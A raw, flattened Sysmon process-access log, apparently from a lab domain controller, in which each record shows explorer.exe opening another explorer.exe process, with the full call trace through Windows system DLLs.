16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 